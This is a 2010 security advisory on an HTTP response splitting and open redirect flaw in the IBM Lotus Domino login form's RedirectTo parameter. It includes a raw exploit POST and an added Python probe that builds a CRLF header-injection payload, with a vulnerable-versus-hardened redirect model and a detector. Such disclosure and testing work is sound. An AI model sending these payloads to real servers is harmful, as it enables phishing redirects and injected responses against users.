
IBM Lotus 6.x HTTP Response Splitting Vulnerability



==========================================
Yaniv Miron aka "Lament" Advisory March 12, 2010
IBM Lotus 6.x HTTP Response Splitting Vulnerability
==========================================

======================
I. BACKGROUND
======================

IBM Lotus Software delivers robust collaboration software that empowers
people to connect, collaborate, and innovate while optimizing the way they
work. With Lotus you can drive better business outcomes through
smarter collaboration.

http://www-01.ibm.com/software/lotus/
=0D
======================
II. DESCRIPTION
======================

The IBM Lotus Domino login form (names.nsf?Login) accepts a RedirectTo
parameter in the login POST and uses it as the target of the redirect it
returns once the request is processed. An attacker who can get a user to
submit a crafted POST therefore controls where the application sends that
user. Because the value lands in a response header, this is the pattern
behind HTTP response splitting: attacker-supplied CR/LF in the parameter
ends the Location header early and lets the attacker append headers or a
second response of their own.

======================
III. ANALYSIS
======================

Exploitation consists of a malicious POST whose RedirectTo value points
wherever the attacker chooses; the user who submits it is redirected off the
IBM Lotus application. The proof of concept below demonstrates the redirect
with a plain external URL. A fix has to reject CR and LF in the parameter and
restrict the target to a local path; filtering only the redirect host leaves
the header injection in place.
======================
IV. EXPLOIT
======================

POST /names.nsf?Login HTTP/1.1
Host: <target Domino server>
Content-Type: application/x-www-form-urlencoded
Connection: Keep-Alive

%25%25ModDate=xxxxxxxxxxxxxxxx&Username=yyyy+zzzz&Password=aaaaaa&RedirectTo=http://www.RedirectExample.com&SaveOptions=0&...

The Host and Content-Type headers are required for a form POST and a
Content-Length matching the body must be sent; the x/y/a values and the
target host are placeholders.
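The following is an added example, not part of the original advisory and not IBM code. It builds the login POST in the shape shown above with a chosen RedirectTo value, models the flawed redirect handling (parameter copied straight into Location) next to a hardened version, and checks a raw response for an injected header and for an off-site Location. The host name, the %%ModDate value, the X-Probe marker header and the credentials are constructed placeholders.

```python
"""Probe builder, vulnerable-vs-hardened redirect model and detector for the
RedirectTo parameter of names.nsf?Login. Added example; all host names,
credentials and the marker header are constructed placeholders."""
from urllib.parse import quote_plus, urlparse

LOGIN_PATH = "/names.nsf?Login"   # request path from the advisory
PROBE_HEADER = "X-Probe"          # hypothetical marker header we try to inject


def build_login_post(host, username, password, redirect_to):
    """Return the raw login POST with a chosen RedirectTo value.

    RedirectTo is form-encoded, so CR/LF travel as %0D%0A; a server that
    decodes the value and copies it into Location is what the probe tests.
    """
    body = "&".join([
        "%25%25ModDate=0000000000000000",      # placeholder for the %%ModDate field
        "Username=" + quote_plus(username),
        "Password=" + quote_plus(password),
        "RedirectTo=" + quote_plus(redirect_to),
        "SaveOptions=0",
    ])
    return (
        f"POST {LOGIN_PATH} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n"
        "Connection: close\r\n"
        "\r\n" + body
    )


def vulnerable_redirect(redirect_to):
    """Model of the flaw: the decoded parameter is concatenated into Location as-is."""
    return ("HTTP/1.1 302 Found\r\n"
            f"Location: {redirect_to}\r\n"
            "Content-Length: 0\r\n\r\n")


def safe_redirect_target(redirect_to, default="/names.nsf"):
    """Hardened handling: accept only a local absolute path with no CR/LF."""
    if not redirect_to or "\r" in redirect_to or "\n" in redirect_to:
        return default
    parsed = urlparse(redirect_to)
    if parsed.scheme or parsed.netloc:          # http://evil.test or //evil.test
        return default
    if not parsed.path.startswith("/") or parsed.path.startswith("/\\"):
        return default
    return redirect_to


def hardened_redirect(redirect_to):
    """Same response shape as the vulnerable handler, but with a validated target."""
    return ("HTTP/1.1 302 Found\r\n"
            f"Location: {safe_redirect_target(redirect_to)}\r\n"
            "Content-Length: 0\r\n\r\n")


def parse_headers(raw):
    """Parse the first response in raw text into (status line, {name: value})."""
    head, _, _ = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def header_injected(raw, marker=PROBE_HEADER):
    """True if the marker we placed in RedirectTo came back as a real header."""
    _, headers = parse_headers(raw)
    return marker.lower() in headers


def open_redirect(raw, expected_host):
    """True if Location points at a host other than the application's own."""
    _, headers = parse_headers(raw)
    loc = urlparse(headers.get("location", ""))
    return bool(loc.netloc) and loc.netloc.lower() != expected_host.lower()


SPLIT_PAYLOAD = "/names.nsf\r\n" + PROBE_HEADER + ": 1"   # CR/LF ends Location early
OFFSITE_PAYLOAD = "http://www.RedirectExample.com"        # the advisory's example value

if __name__ == "__main__":
    print(build_login_post("domino.example.test", "yyyy zzzz", "aaaaaa", SPLIT_PAYLOAD))
    for name, handler in (("vulnerable", vulnerable_redirect), ("hardened", hardened_redirect)):
        print(name, "header injected:", header_injected(handler(SPLIT_PAYLOAD)),
              "| open redirect:", open_redirect(handler(OFFSITE_PAYLOAD), "domino.example.test"))
```

Against a live server, send the string from build_login_post over a socket and feed the reply to header_injected; a marker header that comes back as a header (not as body text) confirms the injection, while an off-site Location alone only confirms the open redirect. The hardened handler falls back to a fixed local path rather than trying to sanitize, since stripping CR/LF but keeping an arbitrary URL would still leave the redirect open.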
======================
V. DISCLOSURE TIMELINE
======================

Jan 2009 Vulnerability found
Jan 2009 Vendor Notification
March 2010 Public Disclosure

======================
VI. CREDIT
======================

Yaniv Miron aka "Lament".
lament@ilhack.org
